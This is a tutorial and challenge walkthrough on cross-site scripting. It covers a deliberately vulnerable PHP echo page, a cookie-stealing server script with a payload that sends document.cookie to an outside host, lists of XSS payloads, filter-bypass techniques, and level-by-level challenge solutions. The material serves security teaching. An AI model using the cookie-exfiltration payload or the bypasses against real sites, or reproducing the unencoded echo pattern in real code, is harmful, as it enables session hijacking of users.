1. XSS
1. Principle: an attacker injects malicious script into a web page and waits for other users to open that page (or for some other trigger condition) so that the script runs in their browsers, inside those users' sessions with the site.
1. XSS example code:
test.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>xss_test</title>
</head>
<body>
<form action="xss.php" method="post">
Please enter your name<br>
<input type="text" name="name">
<input type="submit" value="Submit">
</form>
</body>
</html>
xss.php (deliberately vulnerable: the POSTed value is echoed into the page body without any encoding)
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Test result</title>
</head>
<body>
<?php
// Vulnerable on purpose: untrusted input goes straight into the HTML body.
echo $_POST['name'];
?>
</body>
</html>
Cookie-stealing script
cookie.php (runs on the attacker's server, www.test.com in the payload below, and appends every cookie value it receives to cookie.txt)
<?php
$cookie = $_GET['cookie']."\n";
$cookie_f = fopen('cookie.txt','a');
fwrite($cookie_f,$cookie);
fclose($cookie_f);
?>
xss.js (the payload submitted as the name; it is HTML containing a script element, not a standalone .js file)
<script>window.open('http://www.test.com/cookie.php?cookie='+document.cookie)</script>
Two caveats: cookies set with the HttpOnly flag are not exposed through document.cookie, so this payload cannot read them, and window.open pops a visible window, which is fine in a lab but noisy against a real target.
XSS comes in three types:
reflected XSS: the payload is part of the request (typically a URL parameter or form field) and is echoed straight back in the response, as xss.php does above; the victim has to be made to send that request
stored XSS: the payload is saved by the application (comment, profile field, message) and served to every user who later views it
DOM-based XSS: the page's own client-side script writes attacker-controlled data (location.hash, document.referrer, postMessage data and so on) into a sink such as innerHTML or eval; the server response need not contain the payload at all
2. XSS payloads
<!-- basic forms -->
<script>alert('xss')</script>
<script>alert("xss")</script>
<script>alert(/xss/)</script>
<script>alert('xss');</script>
<!-- using the javascript: pseudo-protocol (runs in an iframe src, and in an a href when clicked; modern browsers refuse it in img src) -->
<iframe src=javascript:alert('xss')></iframe>
<a href=javascript:alert('xss')>
<!-- using basic events -->
<img src="x" onerror=alert('xss')> // fires because the image cannot be loaded
<img src="x" onload=alert('xss')> // fires only if the image actually loads, so src must point at a real image
<img src="x" onclick=alert('xss')> // needs the user to click the (broken) image
event | meaning |
---|---|
onclick | mouse click on the element |
onchange | the value of a form control changed (fires when the control loses focus) |
onerror | a resource such as an image failed to load |
onload | the element or page finished loading |
onmouseover | the pointer entered the element |
onmouseout | the pointer left the element |
onmousemove | the pointer moved while over the element |
onchange is used on form controls such as input; the handler runs once the user edits the value and moves focus away (onmouseover needs less interaction if it is available)
<input type="text" onchange=alert('xss')>
3. Some XSS filter bypasses
-- Several tag attributes (href, iframe src) accept the javascript:[code] pseudo-protocol, so script can run without any script tag
-- Whitespace characters
Commonly used: space, carriage return / newline, tab
Scenario: the filter does a literal match on a JavaScript keyword. Browsers strip ASCII tab and newline characters from a URL before reading its scheme, so javascript: written with a tab or newline inside the word still runs, while a literal match on "javascript" misses it
-- Scrambling the filter rules
1) mixed case, against a case-sensitive filter
<sCRipt>alert('xss')</script>
2) alternative quoting, against a filter that looks for a particular quote character
<script>alert('xss')</script>
<script>alert("xss")</script>
<script>alert(/xss/)</script>
3) a slash instead of a space between the tag name and its attributes; the HTML parser accepts it, a filter that expects whitespace does not
<iframe/src=javascript:alert(1)>
4) double writing, against a filter that removes the string "<script>" once instead of repeating until nothing changes
<scr<script>ipt>alert(1111)</scr</script>ipt>
2. Hands-on: XSS challenge walkthrough
1. Level 1 (no filtering)
First append the basic payload to the URL parameter; the alert pops up.
Other tags do the job as well:
Using the src attribute of an iframe tag to pop the alert
<iframe src=javascript:alert('xss')></iframe>
Using the href attribute of an a tag to pop the alert
<a href=javascript:alert('xss')>ggtest</a>
This is a hyperlink to javascript:alert('xss')
The effect is the same as opening the address javascript:alert('xss') directly in the browser
javascript:alert(document.cookie) can be used here to show the cookies of the current session
Using an img tag to pop the alert
<img src=1 onerror=alert('xss')>
2. Level 2
Try the basic payload; nothing pops up.
Right-click, view the page source, search for what was just entered and see what has been filtered.
The input lands inside the value attribute of an input tag, where a script tag is only attribute text, so the first idea is to close the attribute with a quote and add an onchange handler
<input name=keyword value="<script >alert('xss')</script>">
" onchange =alert(111) <"
That works; closing the whole tag and starting a new one works too
"><script>alert(222)</script> <"
3. Level 3
Same procedure: look at the source and construct the payload.
Angle brackets are filtered now, so opening a new tag is out; breaking out of the attribute is still possible. First attempt, with double quotes:
" onchange=alert(1111) /<"
The attribute turns out to be single-quoted, so the single-quote form is the one that breaks out:
' onchange='alert(/111/)
4. Level 4
<input name=keyword value="111">
The value lands in a double-quoted attribute again; angle brackets are filtered but double quotes pass, so close the attribute and add the handler. Keep a space before the trailing quote, otherwise whatever the filter leaves of <" is glued onto the handler code.
" onchange=alert(555) <"
5. Level 5
The script tag is mangled
and so is the on prefix of event handlers,
which leaves the javascript: pseudo-protocol: it contains neither a <script tag nor on, so it passes the filter, and an a tag carrying it in href runs the code on click
"><a href=javascript:alert(111)>
6. Level 6
Looks like the same filtering as before.
Try the case bypass
"><img sRc=x onError="alert(/xss/)
This does not work. The source shows that "on" is replaced, and the replacement is case-sensitive, so capitalise the o as well. Success:
"><img sRc=x OnError="alert(/xss/)